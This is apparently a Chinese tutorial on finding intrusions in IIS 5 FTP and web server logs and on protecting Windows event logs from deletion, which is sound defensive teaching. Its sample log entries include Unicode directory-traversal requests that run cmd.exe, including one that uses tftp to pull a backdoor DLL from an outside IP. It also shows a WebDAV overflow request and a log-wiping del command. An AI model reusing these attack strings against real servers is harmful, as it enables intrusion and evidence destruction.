1．FTP日志分析
　　FTP日志和WWW日志在默認(rèn)情況下，每天生成一個(gè)日志文件，包含了該日的一切記錄，文件名通常為ex（年份）（月份）（日期）。例如ex040419，就是2004年4月19日產(chǎn)生的日志，用記事本可直接打開(kāi)，普通的有入侵行為的日志一般是這樣的：
#Software: Microsoft Internet Information Services 5.0（微軟IIS5.0）
#Version: 1.0 （版本1.0）
#Date: 20040419 0315 （服務(wù)啟動(dòng)時(shí)間日期）
#Fields: time cip csmethod csuristem scstatus
0315 127.0.0.1 [1]USER administator 331（IP地址為127.0.0.1用戶名為administator試圖登錄）
0318 127.0.0.1 [1]PASS – 530（登錄失敗）
032:04 127.0.0.1 [1]USER nt 331（IP地址為127.0.0.1用戶名為nt的用戶試圖登錄）
032:06 127.0.0.1 [1]PASS – 530（登錄失敗）
032:09 127.0.0.1 [1]USER cyz 331（IP地址為127.0.0.1用戶名為cyz的用戶試圖登錄）
0322 127.0.0.1 [1]PASS – 530（登錄失?。?
0322 127.0.0.1 [1]USER administrator 331（IP地址為127.0.0.1用戶名為administrator試圖登錄）
0324 127.0.0.1 [1]PASS – 230（登錄成功）
0321 127.0.0.1 [1]MKD nt 550（新建目錄失敗）
0325 127.0.0.1 [1]QUIT – 550（退出FTP程序）
　　從日志里就能看出IP地址為127.0.0.1的用戶一直試圖登錄系統(tǒng)，換了四次用戶名和密碼才成功，管理員立即就可以得知這個(gè)IP至少有入侵企圖！而他的入侵時(shí)間、IP地址以及探測(cè)的用戶名都很清楚的記錄在日志上。如上例入侵者最終是用Administrator用戶名進(jìn)入的，那么就要考慮此用戶名是不是密碼失竊？還是被別人利用？接下來(lái)就要想想系統(tǒng)出什么問(wèn)題了。
　　2．WWW日志分析
　　WWW服務(wù)同F(xiàn)TP服務(wù)一樣，產(chǎn)生的日志也是在%systemroot%sys tem32LogFilesW3SVC1目錄下，默認(rèn)是每天一個(gè)日志文件。這里需要特別說(shuō)明一下，因?yàn)閃eb的日志和其他日志不同，它的分析要細(xì)致得多，需要管理員有豐富的入侵、防護(hù)知識(shí)，并且要足夠的細(xì)心，不然，很容易遺漏那種很簡(jiǎn)單的日志，而通常這樣的日志又是非常關(guān)鍵的。由于我們不可能一個(gè)一個(gè)分析，所以這里舉個(gè)簡(jiǎn)單例子：
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 20040419 03:091
#Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent)
20040419 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
20040419 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)

　　通過(guò)分析第六行，可以看出2004年5月19日，IP地址為192.168.1.26的用戶通過(guò)訪問(wèn)IP地址為192.168.1.37機(jī)器的80端口，查看了一個(gè)頁(yè)面iisstart.asp，這位用戶的瀏覽器為compatible;+MSIE+5.0;+Windows+98+DigExt，有經(jīng)驗(yàn)的管理員就可通過(guò)安全日志、FTP日志和WWW日志來(lái)確定入侵者的IP地址以及入侵時(shí)間。
　　對(duì)現(xiàn)在非常常見(jiàn)的SQL注入式攻擊，通過(guò)對(duì)put、get的檢查，也可以大概判斷是那個(gè)頁(yè)面出了問(wèn)題，從而修補(bǔ)。
3．HTTPD事務(wù)日志的分析

　　Microsoft的IIS 5自公布到現(xiàn)在，被黑客利用的漏洞多不勝數(shù)，像.ida/.idq、unicode、WebDavx3和一些未知的漏洞，我們分析日志的目的就是為了分析黑客入侵的行為，對(duì)于沒(méi)有打好補(bǔ)丁包的系統(tǒng)被黑客成功入侵的日志記錄分別對(duì)應(yīng)如下。為了給大家介紹一個(gè)比較醒目的介紹，專門(mén)配置了個(gè)“古老”的服務(wù)器，用舊漏洞給大家做個(gè)演示，很容易觸類(lèi)旁通就懂其它了。

　?。?）unicode漏洞入侵日志記錄

　　這個(gè)是個(gè)非常經(jīng)典的漏洞了，要找這樣的服務(wù)器估計(jì)得去國(guó)外慢慢找了，但是因?yàn)樗娜罩臼亲罱?jīng)典的一個(gè)，所以我們這里特別拿它來(lái)做個(gè)示范。

　　我們打開(kāi)IIS5的Web服務(wù)的日志文件,日志文件默認(rèn)位置在%systemroot%system32LogFiles文件夾下，如圖１所示是一個(gè)典型的Unicode漏洞入侵行為的日志記錄，對(duì)于正常的Web訪問(wèn)，是通過(guò)80端口用GET命令獲取Web數(shù)據(jù)，但通過(guò)非法的字符編碼可繞過(guò)字符驗(yàn)證而得到不應(yīng)該得到的信息。但補(bǔ)上相應(yīng)的補(bǔ)丁可堵上此漏洞。如圖一所示。

　　我們配合入侵來(lái)看下這樣的記錄：通過(guò)下面的編碼我們?cè)谌肭值臅r(shí)候可以查看目標(biāo)機(jī)的目錄文件：

GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200

　　則日志中會(huì)記錄下此訪問(wèn)行為：

2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir 200 -

　　看到了嗎？我們的日志中記錄地一清二楚，來(lái)自192.168.0.1的攻擊者查看我們的目錄。下面一行是向我們的機(jī)器傳送后門(mén)程序的日志記錄：

2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:httpodbc.dll
502 –

　　看到了吧？記錄非常詳細(xì)的，系統(tǒng)里面那個(gè)程序在響應(yīng)都記錄了下來(lái)，這樣我們分析入侵行為就好辦了。

　?。?）WebDavx3遠(yuǎn)程溢出日志記錄

　　過(guò)去一段時(shí)間有名的Wevdavx3漏洞是應(yīng)用最廣泛的，如果系統(tǒng)遭受了此遠(yuǎn)程溢出的攻擊行為，則日志記錄如圖二所示。

2004-04-19 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK
/AAAAA……

　　這表示我們的Web服務(wù)受到了來(lái)自192.168.0.218的攻擊，并鎖定(即關(guān)閉)了WEB服務(wù)，后面的一些亂碼字符是在溢出攻擊時(shí)使用的偏移位猜過(guò)程。

　　上面的幾種日雜都記錄了有入侵行為的IP地址，但此IP地址說(shuō)不定就是攻擊者使用了跳板，也就是說(shuō)此IP很可能是“肉雞”而不是攻擊者的IP，遇到這樣的情況，我們?cè)俨榭雌渌罩疚募€是有可能追查出攻擊者的位置的，但這個(gè)就完全靠管理員的經(jīng)驗(yàn)了。

　　4．日志文件的移位保護(hù)

　　通過(guò)上面的幾個(gè)方法，大家應(yīng)該可以檢測(cè)普通的系統(tǒng)攻擊了，但話說(shuō)回來(lái)，如果上面的攻擊任何一個(gè)成功了，那現(xiàn)在我們都看不到日志了，早被入侵者清空了，所以，為了防患于未然，我們還是針對(duì)常見(jiàn)的刪除日志的方法，把日志挪挪吧。

　　好多文章介紹對(duì)事件日志移位能做到對(duì)系統(tǒng)系統(tǒng)很好的保護(hù)，移位雖是一種保護(hù)方法，但只要在命令行輸入dir c:*.evt/s，一下就可查找到事件日志位置，再刪除可容易了，那怎么辦呢？其實(shí)日志移位要通過(guò)修改注冊(cè)表來(lái)完成，找到注冊(cè)表HKEY_LOCAL_MACHINESYSTEM CurrentControlSet ServicesEventlog下面的Application、Security、System幾個(gè)子鍵，分別對(duì)應(yīng)“應(yīng)用程序日志”、“安全日志”、“系統(tǒng)日志”。如何修改呢？下面我們具體來(lái)看看Application子鍵：File項(xiàng)就是“應(yīng)用程序日志”文件存放的位置，把此鍵值改為要存放日志文件的文件夾，我們?cè)侔?systemroot%system32configappevent.evt文件拷貝到此文件夾，再重啟機(jī)器就可以了。

　　在此介紹移位的目的是為了充分利用Windows 2000在NTFS格式下的“安全”屬性，如果不移位也無(wú)法對(duì)文件進(jìn)行安全設(shè)置操作，右擊移位后的“文件夾選擇屬性”，進(jìn)入“安全”選項(xiàng)卡，不選擇“允許將來(lái)自父系的可繼承權(quán)限傳播給該對(duì)象”，添加“System”組，分別給Everyone組“讀取”權(quán)限，System組選擇除“完全控制”和“修改”的權(quán)限。然后再將系統(tǒng)默認(rèn)的日志文件512KB大小改為你所想要的大小，如20MB。進(jìn)行了上面的設(shè)置后，直接通過(guò)Del C:*.Evt/s/q來(lái)刪除是刪不掉的，相對(duì)要安全很多了。